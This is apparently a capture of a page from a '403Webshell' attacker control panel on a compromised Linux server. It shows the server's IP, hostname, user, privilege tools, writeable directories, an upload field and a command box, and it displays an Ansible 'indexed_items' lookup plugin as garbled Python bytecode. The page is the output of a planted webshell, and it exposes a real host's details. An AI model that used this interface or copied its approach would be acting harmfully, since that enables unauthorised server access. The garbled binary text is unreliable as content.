403Webshell
Server IP : 80.87.202.40  /  Your IP : 216.73.216.169
Web Server : Apache
System : Linux rospirotorg.ru 5.14.0-539.el9.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Dec 5 22:26:13 UTC 2024 x86_64
User : bitrix ( 600)
PHP Version : 8.2.27
Disable Function : NONE
MySQL : OFF |  cURL : ON |  WGET : ON |  Perl : ON |  Python : OFF |  Sudo : ON |  Pkexec : ON
Directory :  /lib/python3.11/site-packages/ansible/plugins/lookup/__pycache__/

Upload File :
current_dir [ Writeable] document_root [ Writeable]

 

Command :


[ Back ]     

Current File : /lib/python3.11/site-packages/ansible/plugins/lookup/__pycache__/indexed_items.cpython-311.pyc
�

���c1��^�ddlmZmZmZeZdZdZdZddl	m
Z
ddlmZGd�de��Z
d	S)
�)�absolute_import�division�print_functiona�
    name: indexed_items
    author: Michael DeHaan
    version_added: "1.3"
    short_description: rewrites lists to return 'indexed items'
    description:
      - use this lookup if you want to loop over an array and also get the numeric index of where you are in the array as you go
      - any list given will be transformed with each resulting element having the it's previous position in item.0 and its value in item.1
    options:
      _terms:
        description: list of items
        required: True
z�
- name: indexed loop demo
  ansible.builtin.debug:
    msg: "at array position {{ item.0 }} there is a value {{ item.1 }}"
  with_indexed_items:
    - "{{ some_list }}"
z�
  _raw:
    description:
      - list with each item.0 giving you the position and item.1 the value
    type: list
    elements: list
)�AnsibleError)�
LookupBasec��eZdZdd�Zd�ZdS)�LookupModuleNc��||_dS�N)�basedir)�selfr�kwargss   �I/usr/lib/python3.11/site-packages/ansible/plugins/lookup/indexed_items.py�__init__zLookupModule.__init__+s
�������c	���t|t��std���|�|��}tt	tt
|����|����S)Nz!with_indexed_items expects a list)�
isinstance�listr�_flatten�zip�range�len)r
�terms�	variablesr�itemss     r�runzLookupModule.run.s[���%��&�&�	D��B�C�C�C��
�
�e�$�$���C��c�%�j�j�)�)�5�1�1�2�2�2rr)�__name__�
__module__�__qualname__rr�rrr	r	)s7����������3�3�3�3�3rr	N)�
__future__rrr�type�
__metaclass__�
DOCUMENTATION�EXAMPLES�RETURN�ansible.errorsr�ansible.plugins.lookuprr	r rr�<module>r)s���C�B�B�B�B�B�B�B�B�B��
��
���
��(�'�'�'�'�'�-�-�-�-�-�-�3�3�3�3�3�:�3�3�3�3�3r

Youez - 2016 - github.com/yon3zu
LinuXploit